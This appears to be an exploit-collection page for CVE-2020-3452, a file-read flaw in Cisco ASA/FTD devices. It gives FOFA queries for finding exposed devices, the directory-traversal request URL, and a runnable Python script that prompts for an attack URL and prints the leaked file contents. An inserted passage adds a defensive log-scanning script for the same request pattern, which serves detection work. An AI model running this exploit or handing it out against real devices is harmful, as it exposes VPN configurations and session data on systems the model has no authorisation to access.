Awesome-POC/network-device/Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452.md
2022-02-20 16:14:31 +08:00

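# Cisco ASA Device Arbitrary File Read Vulnerability CVE-2020-3452
## Vulnerability Description
The web management interface of Cisco Adaptive Security Appliance (ASA) firewall devices and Cisco Firepower Threat Defense (FTD) devices contains an unauthenticated directory traversal vulnerability and a remote arbitrary file read vulnerability. It allows an unauthenticated remote attacker to perform a directory traversal attack and read sensitive files on the target system. This vulnerability cannot be used to gain access to ASA or FTD system files or to underlying operating system (OS) files, so only files in the web system directory can be read, such as WebVPN configuration files, bookmarks, web cookies, partial web content, and HTTP URLs.
## Affected Versions
- Cisco ASA devices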
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120091.png)
- Cisco FTD devices
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120403.png)
## FOFA
```
/+CSCOE+/
Cisco-ASA
```
## Vulnerability Reproduction
**The POC is as follows:**
```plain
https://xxx.xxx.xxx.xxx/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
The request downloads a file:
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120622.png)
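A log-side check for the request shape shown above, as an added example that is not part of the original page: it flags requests to `/+CSCOT+/translation-table` whose `textdomain` or `lang` parameter carries path characters after percent-decoding. The log lines are constructed, and the access-log format, the function names and the rule that legitimate values are plain names are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines; addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Feb/2022:16:14:31 +0800] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4312
203.0.113.7 - - [20/Feb/2022:16:14:40 +0800] "GET /%2bCSCOT%2b/translation-table?type=mst&textdomain=%252bCSCOE%252b/portal_inc.lua&lang=%2e%2e%2f HTTP/1.1" 400 0
198.51.100.20 - - [20/Feb/2022:16:15:02 +0800] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&lang=en-us HTTP/1.1" 200 1290
198.51.100.20 - - [20/Feb/2022:16:15:05 +0800] "GET /+CSCOE+/logon.html HTTP/1.1" 200 8841
"""

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
ENDPOINT = "/+cscot+/translation-table"

def normalise(value, rounds=3):
    """Percent-decode several times so double-encoded input (%252e) is unwrapped."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def traversal_params(target):
    """Return the textdomain/lang parameter names that carry path characters."""
    parts = urlsplit(target)
    if normalise(parts.path).lower() != ENDPOINT:
        return []
    hits = []
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = normalise(raw)
        # Assumption: legitimate values are plain names (e.g. a language tag),
        # so "..", "/" or "\" in either parameter marks the request.
        if name in ("textdomain", "lang") and re.search(r"\.\.|[/\\]", value):
            hits.append(name)
    return hits

def scan(log_text):
    """Return (client, status, flagged parameter names) for matching requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and (hits := traversal_params(m.group(2))):
            findings.append((m.group(1), int(m.group(3)), hits))
    return findings

if __name__ == "__main__":
    for client, status, hits in scan(SAMPLE_LOG):
        print(f"{client} status={status} suspicious={','.join(hits)}")
```

The status code is reported alongside each finding so that flagged requests the device answered with content can be separated from those it rejected.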
## Vulnerability POC
```python
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech
import requests
import urllib3


def title():
    # Banner; the message strings are kept exactly as in the original script.
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
    print('+  \033[34m公众号 : PeiQi文库                                                     \033[0m')
    print('+  \033[34mVersion: Cisco                                                      \033[0m')
    print('+  \033[36m使用格式: python3 CVE-2020-1956                                       \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx                                   \033[0m')
    print('+------------------------------------------')


def POC_1(target_url):
    # Same request as in the reproduction section, appended to the base URL.
    vnln_url = target_url + "/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
    }
    # Certificate verification is disabled below, so silence the related warning.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    response = requests.get(url=vnln_url, headers=headers, verify=False, timeout=20)
    # Heuristic: a "Bad Request" body is treated as patched; any other response
    # is reported as vulnerable, so an unrelated server can give a false positive.
    if "Bad Request" in response.text:
        # Message: "vulnerability has been fixed"
        print("\033[31m[x] 漏洞已修复 \033[0m")
    else:
        # Message: "vulnerable, the response is"
        print("\033[32m[o] 存在漏洞,响应为\n\033[0m", response.text)


if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    POC_1(target_url)
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162120935.png)